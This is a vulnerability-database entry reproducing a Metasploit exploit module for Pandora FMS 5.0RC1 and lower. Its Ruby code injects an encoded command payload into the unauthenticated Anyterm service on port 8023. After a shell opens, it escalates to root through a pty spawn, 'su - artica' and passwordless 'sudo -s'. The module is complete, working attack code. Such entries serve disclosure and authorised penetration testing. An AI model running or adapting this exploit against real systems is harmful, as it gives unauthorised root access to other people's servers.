Pandora FMS Remote Code Execution

2014-01-29T05:46:23
ID MSF:EXPLOIT/LINUX/HTTP/PANDORA_FMS_EXEC
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module exploits a vulnerability found in Pandora FMS 5.0RC1 and lower. It will leverage an unauthenticated command injection in the Anyterm service on port 8023/TCP. Commands are executed as the user "pandora". In Pandora FMS 4.1 and 5.0RC1 the user "artica" is not assigned a password by default, which makes it possible to su to this user from the "pandora" user. The "artica" user has access to sudo without a password, which makes it possible to escalate privileges to root. However, Pandora FMS 4.0 and lower force a password for the "artica" user during installation.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Pandora FMS Remote Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in Pandora FMS 5.0RC1 and lower.
        It will leverage an unauthenticated command injection in the Anyterm service on
        port 8023/TCP. Commands are executed as the user "pandora". In Pandora FMS 4.1 and 5.0RC1
        the user "artica" is not assigned a password by default, which makes it possible to su
        to this user from the "pandora" user. The "artica" user has access to sudo without a
        password, which makes it possible to escalate privileges to root. However, Pandora FMS 4.0
        and lower force a password for the "artica" user during installation.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'xistence <xistence[at]0x90.nl>' # Vulnerability discovery and Metasploit module
        ],
      'References'      =>
        [
        ],
      'Payload'        =>
        {
          'BadChars' => "",
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl python',
            }
        },
      'Platform'        => ['unix'],
      'Arch'            => ARCH_CMD,
      'Targets'         =>
        [
          ['Pandora 5.0RC1', {}]
        ],
      'Privileged'      => true,
      'DisclosureDate'  => "Jan 29 2014",
      'DefaultTarget'   => 0))

    register_options(
      [
       Opt::RPORT(8023),
       OptString.new('TARGETURI', [true, 'The base path to the Pandora instance', '/']),
      ])
  end

  def on_new_session(client)
    print_status("Trying to escalate privileges to root")
    [
      # ignore SIGHUP so the server doesn't kill our root shell
      "trap '' HUP",
      # Spawn a pty for su/sudo
      "python -c 'import pty;pty.spawn(\"/bin/sh\")'",
      # Su to the passwordless "artica" account
      "su - artica",
      # The "artica" use has sudo rights without the need for a
      # password, thus gain root priveleges
      "sudo -s",
    ].each do |command|
      vprint_status(command)
      client.shell_write(command + "\n")
    end

    super
  end

  def check
    # Check version
    print_status("Trying to detect Pandora FMS Remote Gateway")

    res = send_request_cgi({
     'method' => 'GET',
     'uri'    => normalize_uri(target_uri.path, "anyterm.html")
    })

    if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway")
      print_good("Pandora FMS Remote Gateway Detected!")
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Sending payload")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, "/anyterm-module"),
      'vars_post'   => {
        'a'     => "open",
        'p' => "`#{payload.encoded}`"
      }
    })

    if !res || res.code != 200
      fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
    end
  end
end